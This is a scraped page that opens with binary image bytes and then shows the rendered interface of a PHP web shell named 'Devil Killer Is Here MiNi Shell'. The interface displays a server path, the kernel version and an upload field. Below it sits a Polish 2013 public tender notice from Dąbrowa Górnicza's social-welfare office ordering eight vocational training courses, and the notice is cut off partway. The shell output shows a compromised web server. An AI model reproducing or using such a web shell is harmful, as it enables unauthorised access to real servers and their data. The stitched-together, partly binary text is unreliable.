JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/222382-N-2013.html

<p class="kh_header"><b>Dąbrowa Górnicza: Zorganizowanie i przeprowadzenie kursów dla uczestników i uczestniczek projektu 
INTEGRA - program integracji zawodowej i społecznej osób w Dąbrowie Górniczej oraz projektu Bliżej domu- model wychodzenia z bezdomności - 8 zadań</b><br>
<b>Numer ogłoszenia: 222382 - 2013; data zamieszczenia: 10.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Skibińskiego 1, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2622528, faks 032 2613694.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów dla uczestników i uczestniczek projektu 
INTEGRA - program integracji zawodowej i społecznej osób w Dąbrowie Górniczej oraz projektu Bliżej domu- model wychodzenia z bezdomności - 8 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zorganizowanie i przeprowadzenie kursów dla uczestników i uczestniczek projektu INTEGRA-program integracji zawodowej i społecznej osób w Dąbrowie Górniczej oraz projektu Bliżej domu-model wychodzenia z bezdomności-8 zadań. Zad 1-Kurs komputerowy przygotowujący w zakresie ECDL START i ECDL e-Citizen wraz z egzaminem uprawniającym do Europejskiego Certyfikatu Umiejętności Komputerowych w zakresie ECDL START i ECDL e-Citizen
Zad 2-Opiekun osób starszych i niepełnosprawnych z modułem języka niemieckiego (w stopniu podstawowym) Zad 3-Kasjer z obsługą kasy fiskalnej oraz fakturowaniem komputerowym Zad 4-Operator koparko-ładowarki wszystkie typy klasa III Zad 5-Gospodarka magazynowa z obsługą wózka jezdniowego, komputera w zakresie programów magazynowych, podstaw fakturowania komputerowego oraz praktycznymi aspektami realizacji zasad GHP-GMP Zad 6-Kurs spawania metodą MAG (135) Zad 7-Palacz kotłów wodnych i parowych opalanych węglem, koksem, olejem, gazem oraz obsługą wymienników ciepła. Zad 8-Kurs prawo jazdy kategoria B. Projekty współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, realizowane przez Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej. UWAGA! Każdy Wykonawca może złożyć ofertę na jedno lub więcej zadań. I Zad 1-Kurs Komputerowy przygotowujący w zakresie ECDL START i ECDL e-Citizen wraz z egzaminem uprawniającym do Europejskiego Certyfikatu Umiejętności Komputerowych w zakresie ECDL START i ECDL e-Citizen 1.Termin realizacji szkolenia: od daty podpisania umowy do 20.08.2013r. 2. Liczba uczestników: -maks: 18 osób (w tym: Integra-13 osób i Bliżej  domu-5 osób) -min: 13 osób (w tym: Integra-9 osób i Bliżej  domu-4 osoby) 3. Liczba godzin szkoleniowych: Kurs dla każdej z grup uczestników-uczestnika, zostanie przeprowadzony w ilości 60 godzin, w tym: -zajęcia teoretyczne: 20 godzin lekcyjnych (45 min) -zajęcia praktyczne: 40 godzin zegarowych (60 min) 4.Program kursu: musi odpowiadać aktualnie obowiązującym przepisom prawa w zakresie  go obejmującym. 5. Cel kursu: przygotowanie uczestników-uczestniczek z zakresu wiedzy i umiejętności umożliwiających przystąpienie do procedury zdawania egzaminu i uzyskania EUROPEJSKIEGO CERTYFIKATU UMIEJĘTNOŚCI KOMPUTEROWYCH E-OBYWATEL (ECDL e-Citizen) oraz ECDL START-zgodnie ze standardami przyjętymi dla kursów ECDL.6. Organizacja szkolenia: 1) Wykonawca zorganizuje kurs zgodnie z wymaganiami określonymi w rozdziale III.9 SIWZ. 2) Wykonawca zorganizuje egzamin w Certyfikowanym Centrum Egzaminacyjnym ECDL na terenie woj. śląskiego zgodnie z procedurą obowiązującą przy ubieganiu się o uzyskanie certyfikatu ECDL dla każdego uczestnika, który ukończył kurs i spełnia warunki uprawniające do przystąpienia do egzaminu ECDL. 3) Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu o którym mowa w ppkt. 2 dla każdego uczestnika o którym mowa w ppkt.2. 4) Uczestnicy którzy nie zaliczą pozytywnie egzaminu o którym mowa w ppkt. 2 będą mogli powtarzać egzamin zgodnie z ogólnie obowiązującymi przepisami, jednak koszt dodatkowych egzaminów będą ponosili sami uczestnicy. II Zad 2-Opiekun osób starszych i niepełnosprawnych z modułem kursu języka niemieckiego (w stopniu podstawowym) 1.Termin realizacji usługi: Od daty podpisania umowy do 20.08.2013r. 2. Liczba uczestników: -maks: 10 osób (w tym: Integra-9 osób i Bliżej domu-1 osoba) -min: 7 osób (w tym: Integra-6 osób i Bliżej  domu-1 osoba) 3. Liczba godzin szkoleniowych: Kurs dla każdej z grup uczestników-uczestnika, zostanie przeprowadzony w ilości 170 godzin, w tym: -zajęcia teoretyczne: 50 godzin lekcyjnych (45 min) -zajęcia praktyczne: 120 godzin zegarowych (60 min) 4.Program kursu: musi  odpowiadać aktualnie obowiązującym przepisom prawa w zakresie go obejmującym. Program powinien zawierać zagadnienia przygotowujące  uczestników z zakresu wiedzy:-kurs języka niemieckiego dla opiekunów osób starszych i niepełnosprawnych -rola i zadania opiekuna -sylwetka zawodowa opiekuna -podstawy psychologii -podstawy psychiatrii -organizacja pracy własnej i etyka zawodowa -jak radzić sobie ze stresem -formy opieki i pomocy -anatomia i fizjologia -proces starzenia się organizmu człowieka -postawa wobec uczuć i sposobu zachowania pielęgnowanej osoby -pielęgnacja osób w podeszłym wieku i chorych -choroby wieku podeszłego -obserwacja chorego -pomiar i monitoring parametrów -skutki długotrwałego unieruchomienia -opieka nad umierającymi i towarzyszenie śmierci -aspekty pielęgnacyjne rehabilitacji -pierwsza pomoc w geriatrii -zasady żywienia ludzi starszych, niepełnosprawnych i chorych -wybrane zagadnienia farmakoterapii -zagadnienia prawne -zasady BHP oraz ochrona p.poż. -system pomocy społecznej i służby zdrowia 5. Cel kursu: przygotowanie uczestników-uczestniczek z zakresu wiedzy i umiejętności umożliwiających świadczenie usługi opiekuna-opiekunki osób starszych i niepełnosprawnych także z możliwością pracy w Niemczech. 6. Organizacja szkolenia: 1) Wykonawca zorganizuje kurs zgodnie z wymaganiami określonymi w rozdziale III.9 SIWZ. 2) Szkolenie winno zakończyć się egzaminem  wewnętrznym dla każdego uczestnika, który ukończył kurs i spełnia warunki uprawniające do przystąpienia do egzaminu ze zdobytej wiedzy teoretycznej i praktycznej oraz wydaniem zaświadczenia lub innego dokumentu potwierdzającego  ukończenie przedmiotowego szkolenia i uzyskanie kwalifikacji. 3) Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu o którym mowa w ppkt. 2 dla każdego uczestnika o którym mowa w ppkt.2. (jeżeli opłata występuje) 4) Uczestnicy którzy nie zaliczą pozytywnie egzaminu o którym mowa w ppkt. 2 będą mogli powtarzać egzamin zgodnie z ogólnie obowiązującymi przepisami, jednak koszt dodatkowych egzaminów będą ponosili sami uczestnicy.  III Zad 3-Kasjer z obsługą kasy fiskalnej oraz fakturowaniem komputerowym 1.Termin realizacji usługi:
Od daty podpisania umowy do 20.08.2013r. 2. Liczba uczestników: -maks: 8 osób (w tym: Integra-7 osób i Bliżej domu-1 osoba) -min: 6 osób (w tym: Integra-5 osób i Bliżej domu-1 osoba) 3. Liczba godzin szkoleniowych: Kurs dla każdej z grup uczestników-uczestnika, zostanie przeprowadzony w ilości 30 godzin, w tym: -zajęcia teoretyczne: 8 godzin lekcyjnych (45 min) -zajęcia praktyczne: 22 godzin zegarowych (60 min) 4. Program kursu: musi odpowiadać aktualnie obowiązującym przepisom prawa w zakresie go obejmującym. Program powinien zawierać zagadnienia przygotowujące uczestników z zakresu wiedzy: -fakturowanie komputerowe -zasady wystawiania faktur -faktury korygujące -faktury proforma -kryteria i warunki techniczne, którym muszą odpowiadać kasy fiskalne -warunki stosowania kas przez podatników -budowa, rodzaje kas, systemy kasowe -obowiązkowe informacje zawarte na paragonie -kryteria i sposoby prowadzenia kontroli przez Urząd Skarbowy -ewidencja sprzedaży za pomocą kasy -sprzedaż za pomocą kodów PLU, kodów kreskowych -różne formy płatności -anulowanie paragonu -programowanie stawek VAT -raporty: dobowy, okresowy, towarów, zaprogramowanych opakowań zwrotnych -przyjmowanie reklamacji i zwrotów -rozliczanie utargu -przyjmowanie, wydawanie lub zwrot towaru na magazyn -inwentaryzacja -obowiązki kasjera -rozmowa z klientem -praktyczne umiejętności na stanowisku handlowym -techniki sprzedaży 5. Cel kursu: przygotowanie uczestników-uczestniczek z zakresu wiedzy i umiejętności umożliwiających wykonywanie pracy kasjera z obsługą kasy fiskalnej i fakturowaniem komputerowym. 6. Organizacja szkolenia: 1) Wykonawca zorganizuje kurs zgodnie z wymaganiami określonymi w rozdziale III.9 SIWZ. 2) Szkolenie winno zakończyć się egzaminem  wewnętrznym dla każdego uczestnika, który ukończył kurs i spełnia warunki uprawniające do przystąpienia do egzaminu ze zdobytej wiedzy teoretycznej i praktycznej oraz wydaniem zaświadczenia lub innego dokumentu  potwierdzającego  ukończenie przedmiotowego szkolenia i uzyskanie kwalifikacji. 3) Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu o którym mowa w ppkt. 2 dla każdego uczestnika o którym mowa w ppkt.2. (jeżeli opłata występuje) 4) Uczestnicy którzy nie zaliczą pozytywnie egzaminu o którym mowa w ppkt. 2 będą mogli powtarzać egzamin zgodnie z ogólnie obowiązującymi przepisami, jednak koszt dodatkowych egzaminów będą ponosili sami uczestnicy. IV. Zad 4-Operator koparko-ładowarki wszystkie typy klasa III 1.Termin realizacji usługi: Od dnia podpisania umowy do 20.08.2013r. 2. Liczba uczestników: -maks: 6 osób ( w tym: Integra-4 osoby i Bliżej domu-2 osoby) -min: 4 osoby (w tym: Integra-3 osoby i Bliżej domu-1 osoba) 3. Liczba godzin szkoleniowych: Kurs dla każdej z grup uczestników-uczestnika, zostanie przeprowadzony w ilości 202 godziny, w tym -zajęcia teoretyczne: 116 godzin lekcyjnych (45 min) -zajęcia praktyczne: 86 zegarowych (60 min) 4. Program kursu: musi być przeprowadzony zgodnie z aktualnie  obowiązującymi przepisami prawa w zakresie go obejmującym, w szczególności z wymaganiami określonymi w Rozporządzeniu  Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i urządzeń  technicznych do robót ziemnych  budowlanych i drogowych (Dz. U z dnia 15 października 2001 r. Nr 118, poz. 1263). Wykonawca powinien posiadać certyfikat Instytutu Mechanizacji  Budownictwa i Górnictwa Skalnego §26, ust.3 Rozporządzenia Ministra Gospodarki z dnia 20 września 2001r.  w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i urządzeń  technicznych do robót ziemnych, budowlanych i drogowych. Program powinien zawierać zagadnienia przygotowujące uczestników z zakresu wiedzy -użytkowanie eksploatacyjne -dokumentacja techniczna -bezpieczeństwo i higiena pracy -podstawy elektrotechniki -silniki spalinowe -elementy hydrauliki -budowa koparko-ładowarek -technologia robót -zajęcia praktyczne w parku maszynowym na poligonie ćwiczebnym 5. Cel kursu: przygotowanie uczestników-uczestniczek z zakresu wiedzy i umiejętności umożliwiających przystąpienie do procedury zdawania egzaminu i uzyskania uprawnień do obsługi koparko-ładowarek wszystkie typy klasa III. 6. Organizacja szkolenia: 1) Wykonawca zorganizuje kurs zgodnie z wymaganiami określonymi w rozdziale III.9 SIWZ. 2) Wykonawca zorganizuje państwowy egzamin zewnętrzny dla każdego uczestnika, który ukończył kurs i spełnia warunki uprawniające do przystąpienia do egzaminu państwowego. 3) Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu o którym mowa w ppkt. 2 dla każdego uczestnika o którym mowa w ppkt.2. 4) Uczestnicy którzy nie zaliczą pozytywnie egzaminu o którym mowa w ppkt. 2 będą mogli powtarzać egzamin zgodnie z ogólnie obowiązującymi przepisami, jednak koszt dodatkowych egzaminów będą ponosili sami uczestnicy. V Zad 5-Gospodarka magazynowa z obsługą wózków jezdniowych, komputera w zakresie programów magazynowych, podstaw fakturowania komputerowego oraz praktycznymi aspektami realizacji zasad GHP-GMP 1.Termin realizacji usługi: Od daty podpisania umowy do 20.08.2013r. 2. Liczba uczestników: -maks: 13 osób (w tym: Integra-8 osób i Bliżej domu-5 osób) -min: 10 osób (w tym: Integra-6 osób i Bliżej domu-4 osoby) 3. Liczba godzin szkoleniowych:
Kurs dla każdej z grup uczestników-uczestnika, zostanie przeprowadzony w ilości 180 godzin, w tym: -zajęcia teoretyczne: 60 godzin lekcyjnych (45 min) -zajęcia praktyczne: 120 godzin zegarowych (60 min) 4. Program kursu: musi być przeprowadzony zgodnie z aktualnie obowiązującymi przepisami prawa w zakresie go obejmującym, w szczególności z ustawą z dnia 21 grudnia 2000r. o dozorze technicznym (Dz. U. z 2000r. Nr 122, poz. 1321 z późn. zm.) oraz Rozporządzeniem  Ministra Gospodarki z dnia 18 lipca 2001r. w sprawie trybu sprawdzania kwalifikacji  wymaganych przy obsłudze i konserwacji urządzeń technicznych (Dz. U. z 2001 r. Nr 79, poz. 849 z późn. zm.) Program powinien zawierać zagadnienia przygotowujące  uczestników z zakresu wiedzy: -zagadnienia prawne -finanse -marketing -obsługa komputera w zakresie dowolnego programu magazynowego -fakturowanie komputerowe -zasady wystawiania faktur -faktury korygujące -faktury proforma -źródła i warunki zakupu towarów -wypełnianie dokumentacji -sprzedaż, przyjmowanie i wydawanie towarów -przewozy towarów -handel hurtowy -zasady gospodarki magazynowej i technologii prac -towaroznawstwo i odbiór jakościowy -zasady higieny w handlu żywnością -typy wózków -budowa wózka -czynności operatora przy obsłudze przed rozpoczęciem pracy i po pracy z wózkiem -czynności operatora w czasie pracy z wózkiem -wiadomości z zakresu bhp -ładunkoznawstwo -praktyczna nauka jazdy -wymiana butli 5. Cel kursu: przygotowanie uczestników-uczestniczek z zakresu wiedzy i umiejętności umożliwiających przystąpienie do procedury zdawania egzaminu i uzyskania uprawnień do obsługi wózków jezdniowych, komputera w zakresie programów magazynowych, podstaw fakturowania komputerowego oraz stosowania praktycznych aspektów i realizacji zasad GHP-GMP 6. Organizacja szkolenia: 1) Wykonawca zorganizuje kurs zgodnie z wymaganiami określonymi w rozdziale III.9 SIWZ. 2) Szkolenie winno zakończyć się egzaminem  wewnętrznym dla każdego uczestnika, który ukończył kurs i spełnia warunki uprawniające do przystąpienia do egzaminu ze zdobytej wiedzy teoretycznej i praktycznej oraz wydaniem zaświadczenia lub innego dokumentu potwierdzającego  ukończenie przedmiotowego szkolenia i uzyskanie kwalifikacji. 3) Wykonawca w zakresie wózka jezdniowego zorganizuje państwowy egzamin zewnętrzny przeprowadzony przez Komisję kwalifikacyjną-zgodnie z rozporządzeniem, o którym mowa w pkt 4 ) dla każdego uczestnika, który ukończył kurs i spełnia warunki uprawniające do przystąpienia do egzaminu państwowego. 4) Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu o którym mowa w ppkt. 2 dla każdego uczestnika o którym mowa w ppkt.2. (jeżeli opłata występuje) i w ppkt. 3 dla każdego uczestnika, o którym mowa w ppkt 3. 5) Uczestnicy którzy nie zaliczą pozytywnie egzaminu o którym mowa w ppkt. 2 lub w ppkt. 3 będą mogli powtarzać egzamin zgodnie z ogólnie obowiązującymi przepisami, jednak koszt dodatkowych egzaminów będą ponosili sami uczestnicy. VI Kurs spawania metodą MAG (135) 1.Termin realizacji usługi: Od daty podpisania umowy do 27.09.2013r. 2. Liczba uczestników: -maks: 4 osób (w tym: Integra-4 osoby i Bliżej domu-0 osób) -min: 3 osób (w tym: Integra-3 osoby i Bliżej domu-0 osób) 3. Liczba godzin szkoleniowych:
Kurs dla każdej z grup uczestników/uczestnika, zostanie przeprowadzony w ilości 357 godzin, w tym: -zajęcia teoretyczne: 107 godzin lekcyjnych (45 min) -zajęcia praktyczne:	250 godzin zegarowych (60 min) 4. Program kursu: musi odpowiadać  aktualnie obowiązującym przepisom prawa w zakresie go obejmującym. Program powinien zawierać zagadnienia przygotowujące uczestników z zakresu wiedzy: -przygotowanie uczestników i uczestniczek do egzaminów końcowych IS-PT-FW-1-135, IS-P-BW-1-135 lub IS-T-BW-1-135 wg wytycznych Instytutu Spawalnictwa. -spawanie blach i rur spoinami pachwinowymi -spawanie blach spoinami czołowymi -spawanie rur spoinami czołowymi 5. Cel kursu: przygotowanie uczestników-uczestniczek z zakresu wiedzy i umiejętności umożliwiających przystąpienie do procedury zdawania egzaminu i uzyskania uprawnień do spawania jw. 6. Organizacja szkolenia: 1) Wykonawca zorganizuje kurs zgodnie z wymaganiami określonymi w rozdziale III.9 SIWZ. 2) Wykonawca zorganizuje państwowy egzamin zewnętrzny dla każdego uczestnika, który ukończył kurs i spełnia warunki uprawniające do przystąpienia do egzaminu państwowego przeprowadzonego przez uprawnioną instytucję. 3) Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu o którym mowa w ppkt. 2 dla każdego uczestnika o którym mowa w ppkt.2. 4) Uczestnicy którzy nie zaliczą pozytywnie egzaminu o którym mowa w ppkt. 2 będą mogli powtarzać egzamin zgodnie z ogólnie obowiązującymi przepisami, jednak koszt dodatkowych egzaminów będą ponosili sami uczestnicy. VII Zad 7 Palacz  kotłów wodnych i parowych opalanych węglem, koksem, olejem, gazem oraz obsługa wymienników ciepła 1.Termin realizacji usługi: Od dnia podpisania umowy do 20.08.2013r. 2. Liczba uczestników: -maks: 6 osób (w tym: Integra-0 osób i Bliżej domu-6 osób) -min: 4 osoby (w tym: Integra-0 osób i Bliżej domu-4 osoby) 3. Liczba godzin szkoleniowych: Kurs dla każdej z grup uczestników-uczestnika, zostanie przeprowadzony w ilości 85 godzin, w tym: -zajęcia teoretyczne:	25 godzin lekcyjnych (45 min) -zajęcia praktyczne: 60 godzin zegarowych (60 min) 4. Program kursu: musi odpowiadać aktualnie obowiązującym przepisom prawa w zakresie go obejmującym. Program powinien zawierać zagadnienia przygotowujące uczestników z zakresu wiedzy: -przepisy ogólne i wybrane zagadnienia -przepisy o dozorze technicznym -organizacja pracy przy urządzeniach cieplnych -obowiązki palacza -techniki cieplne -armatura i materiały -schemat kotłowni CO -woda w gospodarce cieplnej -kotły parowe i wodne -eksploatacja kotłów -sieci i instalacje cieplne -zasady eksploatacji wymienników ciepła -konserwacja wymienników ciepła -naprawa wymienników ciepła -przemysłowe urządzenia pary i gorącej wody -paliwa stałe, paliwa ciekłe, -aparatura kontrolno-pomiarowa -BHP przy urządzeniach cieplnych i na stanowisku palacza CO -ochrona p. poż. -ratownictwo medyczne 5. Cel kursu: przygotowanie uczestników-uczestniczek z zakresu wiedzy i umiejętności umożliwiających przystąpienie do procedury zdawania egzaminu i uzyskania uprawnień do obsługi  kotłów wodnych i parowych opalanych węglem, koksem, olejem, gazem oraz obsługi wymienników ciepła 6. Organizacja szkolenia:
1) Wykonawca zorganizuje kurs zgodnie z wymaganiami określonymi w rozdziale III.9 SIWZ. 2) Wykonawca zorganizuje państwowy egzamin zewnętrzny dla każdego uczestnika, który ukończył kurs i spełnia warunki uprawniające do przystąpienia do egzaminu państwowego przeprowadzonego przez uprawnioną instytucję. 3) Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu o którym mowa w ppkt. 2 dla każdego uczestnika o którym mowa w ppkt.2. 4) Uczestnicy którzy nie zaliczą pozytywnie egzaminu o którym mowa w ppkt. 2 będą mogli powtarzać egzamin zgodnie z ogólnie obowiązującymi przepisami, jednak koszt dodatkowych egzaminów będą ponosili sami uczestnicy.  VII Zad 8-Kurs prawa jazdy kategoria B. 1.Termin realizacji usługi: Od daty podpisania umowy do 27.09.2013r. 2. Liczba uczestników: -maks: 29 osób (w tym: Integra-29 osób i Bliżej domu-0 osób) -min: 20 osób (w tym: Integra-20 osób i Bliżej domu-0 osób) 3. Liczba godzin szkoleniowych: Kurs dla każdej z grup uczestników-uczestnika, zostanie przeprowadzony w ilości 60 godzin, w tym: -zajęcia teoretyczne: 30 godzin z zakresu przepisów prawa ruchu drogowego i udzielania pierwszej pomocy, (godziny lekcyjne-45 min.) -zajęcia praktyczne: 30 godzin zajęć praktycznych w warunkach miejskich, na trasie i na placu manewrowym, licząc na jednego uczestnika kursu (godziny zegarowe-60 min.) 4. Program kursu: 1) Musi odpowiadać aktualnie obowiązującym przepisom prawa w zakresie go obejmującym w szczególności kurs  dla każdej z grup osób-osoby, zostanie przeprowadzony w zakresie i wymiarze określonym przez obowiązujące przepisy, tj.: ustawa z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2012 r. poz. 1137 z późn. zm.), Rozporządzenie Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz.U.2005 Nr 217 poz. 1834 z późn. zm.), Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012r. (Dz. U. z 2012 r. poz. 995 z późn. zm.) Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012r. (Dz. U. z 2012 r. poz. 995 z późn. zm.) w sprawie egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień przez egzaminatorów oraz wzorów dokumentów stosowanych w tych sprawach. 2) Częstotliwość realizacji zajęć: dni robocze i wolne w godzinach 6.00 - 22.00 3) Terminy i godziny zajęć praktycznych szkolenia (praktyczna nauka jazdy) będą uzgadniane indywidualnie pomiędzy danym uczestnikiem i instruktorem. 5. Cel kursu: przygotowanie uczestników-uczestniczek z zakresu wiedzy i umiejętności umożliwiających przystąpienie do procedury zdawania egzaminu i uzyskania uprawnień kategorii B do prowadzenia pojazdów. 6. Organizacja szkolenia: 1) Wykonawca zorganizuje kurs zgodnie z wymaganiami określonymi w rozdziale III.9 SIWZ. 2) Przed rozpoczęciem zajęć każdej grupy osób-osoby, Wykonawca zobowiązany jest zorganizować i skierować uczestników szkolenia na badania lekarskie, potwierdzające brak przeciwwskazań zdrowotnych do kierowania pojazdami oraz pokryć koszt tych badań. 3) Szkolenie zakończy się przeprowadzeniem egzaminu wewnętrznego oraz wydaniem stosownych zaświadczeń (zgodnych z Rozporządzeniem o którym mowa w pkt. 4 ppkt. 1 dla osób ubiegających się o prawo jazdy kat. B). 4) Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu państwowego za każdego uczestnika, który ukończył kurs i zdał z wynikiem pozytywnym teoretyczny i praktyczny egzamin wewnętrzny. Uczestnicy którzy nie zaliczą pozytywnie egzaminu teoretycznego lub praktycznego, będą mogli powtarzać egzamin zgodnie z ogólnie obowiązującymi przepisami, jednak koszt dodatkowych egzaminów będą ponosili sami uczestnicy. 7. Miejsce realizacji zajęć: 1) Teoretyczne zajęcia szkoleniowe muszą odbywać się na terenie miasta Dąbrowa Górnicza w pomieszczeniach dostosowanych do ich prowadzenia, uwzględniając liczebność osób w grupie, zgodnie ze specyfiką zajęć i odpowiednio w tym celu wyposażonych tj spełniających warunki m.in sanitarne, bezpieczeństwa, akustyczne. 2) Praktyczne zajęcia szkoleniowe mogą odbywać się na terenie miasta Dąbrowa Górnicza lub poza terenem miasta, z 